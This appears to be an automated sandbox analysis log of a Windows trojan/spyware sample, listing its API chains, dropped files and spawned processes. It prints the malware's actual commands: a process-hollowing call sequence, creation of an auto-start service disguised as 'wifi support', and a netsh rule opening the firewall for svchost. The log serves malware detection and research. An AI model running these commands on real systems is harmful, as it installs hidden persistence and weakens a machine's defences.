                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0040193B Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00401947 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0040174C NtMapViewOfSection,NtMapViewOfSection,Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00401951 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00401FF1 NtQuerySystemInformation,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004016FD NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0040158E NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015A6 NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015BC NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_056BF480 NtAllocateVirtualMemory,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_056BF3A0 NtUnmapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 2757.exe.3.drStatic PE information: Resource name: RT_STRING type: VAX-order 68k Blit mpx/mux executable
                      Source: 28C2.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 4583.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2757.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 4187.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 1B15.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 28C2.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 315E.exe.3.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 2757.exe.3.drStatic PE information: Section: .rdata ZLIB complexity 0.999518743408
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.00042941046
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.0006377551
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.001953125
                      Source: 315E.exe.3.drStatic PE information: Section: ZLIB complexity 1.021484375
                      Source: 4BED.exe.3.drStatic PE information: Section: ZLIB complexity 1.00015356453
                      Source: nkINykHreE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haifbcdJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@57/40@107/34
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: nkINykHreE.exeVirustotal: Detection: 25%
                      Source: nkINykHreE.exeReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\nkINykHreE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
                      Source: C:\Users\user\Desktop\nkINykHreE.exeProcess created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Users\user\AppData\Roaming\haifbcdProcess created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeProcess created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2997.exe C:\Users\user\AppData\Local\Temp\2997.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\18D.exe C:\Users\user\AppData\Local\Temp\18D.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start dbgxuqbr
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe"
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\scifbcd C:\Users\user\AppData\Roaming\scifbcd
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2757.exe C:\Users\user\AppData\Local\Temp\2757.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4187.exe C:\Users\user\AppData\Local\Temp\4187.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\13E0.exe C:\Users\user\AppData\Local\Temp\13E0.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1B15.exe C:\Users\user\AppData\Local\Temp\1B15.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\28C2.exe C:\Users\user\AppData\Local\Temp\28C2.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\315E.exe C:\Users\user\AppData\Local\Temp\315E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4583.exe C:\Users\user\AppData\Local\Temp\4583.exe
                      Source: C:\Users\user\Desktop\nkINykHreE.exeProcess created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2997.exe C:\Users\user\AppData\Local\Temp\2997.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\18D.exe C:\Users\user\AppData\Local\Temp\18D.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Users\user\AppData\Roaming\haifbcdProcess created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeProcess created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start dbgxuqbr
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\115B.tmpJump to behavior
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_0041C6FF SetLastError,GetProfileStringW,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoA,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringW,GetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4140:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3952:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: \H
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: \H
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCommand line argument: E6B
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-BX<
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-BX<
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-BX<
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-B
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: \H
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-BX<
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-BX<
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCommand line argument: e-B
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-BX<
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-BX<
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-BX<
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-B
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: \H
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-BX<
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-BX<
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCommand line argument: e-B
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\hatisicovapehe\p.pdb source: 2997.exe, 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vuyeguw\zofaxekax.pdb source: nkINykHreE.exe, nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\gilos\ye.pdb source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: i6`C:\vuyeguw\zofaxekax.pdbhQD source: nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
